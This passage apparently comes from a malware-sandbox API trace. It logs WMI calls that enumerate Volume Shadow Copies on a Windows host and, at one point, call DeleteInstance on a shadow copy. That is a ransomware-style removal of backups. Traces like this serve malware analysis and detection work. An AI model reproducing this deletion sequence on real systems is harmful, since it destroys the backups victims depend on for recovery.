[7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x24d260) returned 0x0 [0129.702] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x24d260, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0129.702] WbemDefPath:IUnknown:Release (This=0x24d260) returned 0x3 [0129.702] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0129.702] WbemDefPath:IUnknown:AddRef (This=0x1c903310) returned 0x4 [0129.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0129.702] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x3 [0129.702] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x2 [0129.702] WbemDefPath:IUnknown:Release (This=0x1c90a250) returned 0x0 [0129.703] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x1 [0129.703] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0129.703] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0129.703] WbemDefPath:IUnknown:AddRef (This=0x1c903310) returned 0x2 [0129.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903310) returned 0x0 [0129.703] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x2 [0129.703] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x1 [0129.703] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0129.703] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0129.703] WbemDefPath:IUnknown:AddRef (This=0x1c903310) returned 0x2 [0129.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903310, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903310) returned 0x0 [0129.704] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x2 [0129.704] WbemDefPath:IUnknown:AddRef (This=0x1c903310) returned 0x3 [0129.704] WbemDefPath:IWbemPath:SetText (This=0x1c903310, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0129.705] WbemDefPath:IUnknown:Release (This=0x1c903310) returned 0x2 [0129.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0129.705] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0129.705] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0129.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0129.705] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0129.705] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0129.705] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0129.705] SysStringLen (param_1="root\\cimv2") returned 0xa [0129.705] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0129.705] SysStringLen (param_1="root\\cimv2") returned 0xa [0129.706] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0129.706] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0129.706] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0129.706] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0129.706] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0129.706] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0129.706] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0129.709] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903310, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0129.709] WbemDefPath:IWbemPath:GetText (in: This=0x1c903310, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0129.709] WbemDefPath:IWbemPath:GetText (in: This=0x1c903310, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0129.709] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0129.709] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0129.710] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0129.710] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0129.710] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0129.710] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0129.710] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0129.710] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0129.710] IWbemClassObject:Get (in: This=0x1c90af10, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0129.710] WbemDefPath:IWbemPath:GetText (in: This=0x1c903310, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0129.710] WbemDefPath:IWbemPath:GetText (in: This=0x1c903310, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"") returned 0x0 [0129.710] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.643] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0130.643] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c90ff20, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0130.645] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c90ff20) returned 0x0 [0130.645] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0130.645] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0130.645] IUnknown:AddRef (This=0x1c90ff20) returned 0x3 [0130.645] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0130.646] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c90ff28) returned 0x0 [0130.646] IMarshal:GetUnmarshalClass (in: This=0x1c90ff28, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0130.646] IUnknown:Release (This=0x1c90ff28) returned 0x3 [0130.646] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0130.646] IUnknown:AddRef (This=0x1c90ff20) returned 0x4 [0130.646] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0130.646] IUnknown:Release (This=0x1c90ff20) returned 0x3 [0130.646] IUnknown:Release (This=0x1c90ff20) returned 0x2 [0130.646] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0130.646] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0130.646] IUnknown:AddRef (This=0x1c90ff20) returned 0x3 [0130.646] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c90ff20) returned 0x0 [0130.646] IUnknown:Release (This=0x1c90ff20) returned 0x3 [0130.647] IUnknown:Release (This=0x1c90ff20) returned 0x2 [0130.647] IUnknown:Release (This=0x1c90ff20) returned 0x1 [0130.647] CoTaskMemFree (pv=0x27f6b0) [0130.647] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0130.647] IUnknown:AddRef (This=0x1c90ff20) returned 0x2 [0130.647] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0130.647] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0130.647] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x53 [0130.647] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0130.647] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0130.647] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0130.647] IUnknown:Release (This=0x212498) returned 0x1 [0130.648] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c90a310) returned 0x0 [0130.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c90a310, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0130.648] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c90a310, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c9033d0) returned 0x0 [0130.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c9033d0) returned 0x0 [0130.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0130.649] WbemDefPath:IUnknown:AddRef (This=0x1c9033d0) returned 0x3 [0130.649] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0130.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b793670) returned 0x0 [0130.649] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b793670, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0130.649] WbemDefPath:IUnknown:Release (This=0x1b793670) returned 0x3 [0130.649] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0130.649] WbemDefPath:IUnknown:AddRef (This=0x1c9033d0) returned 0x4 [0130.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0130.649] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x3 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x2 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c90a310) returned 0x0 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x1 [0130.650] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0130.650] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0130.650] WbemDefPath:IUnknown:AddRef (This=0x1c9033d0) returned 0x2 [0130.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c9033d0) returned 0x0 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x2 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x1 [0130.650] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0130.650] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0130.650] WbemDefPath:IUnknown:AddRef (This=0x1c9033d0) returned 0x2 [0130.650] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9033d0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c9033d0) returned 0x0 [0130.650] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x2 [0130.651] WbemDefPath:IUnknown:AddRef (This=0x1c9033d0) returned 0x3 [0130.651] WbemDefPath:IWbemPath:SetText (This=0x1c9033d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0130.651] WbemDefPath:IUnknown:Release (This=0x1c9033d0) returned 0x2 [0130.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0130.651] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0130.651] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0130.651] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0130.651] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.651] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0130.652] SysStringLen (param_1="root\\cimv2") returned 0xa [0130.652] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0130.652] SysStringLen (param_1="root\\cimv2") returned 0xa [0130.652] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0130.652] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0130.652] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.652] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0130.652] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0130.652] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0130.652] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0130.654] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c9033d0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0130.654] WbemDefPath:IWbemPath:GetText (in: This=0x1c9033d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, 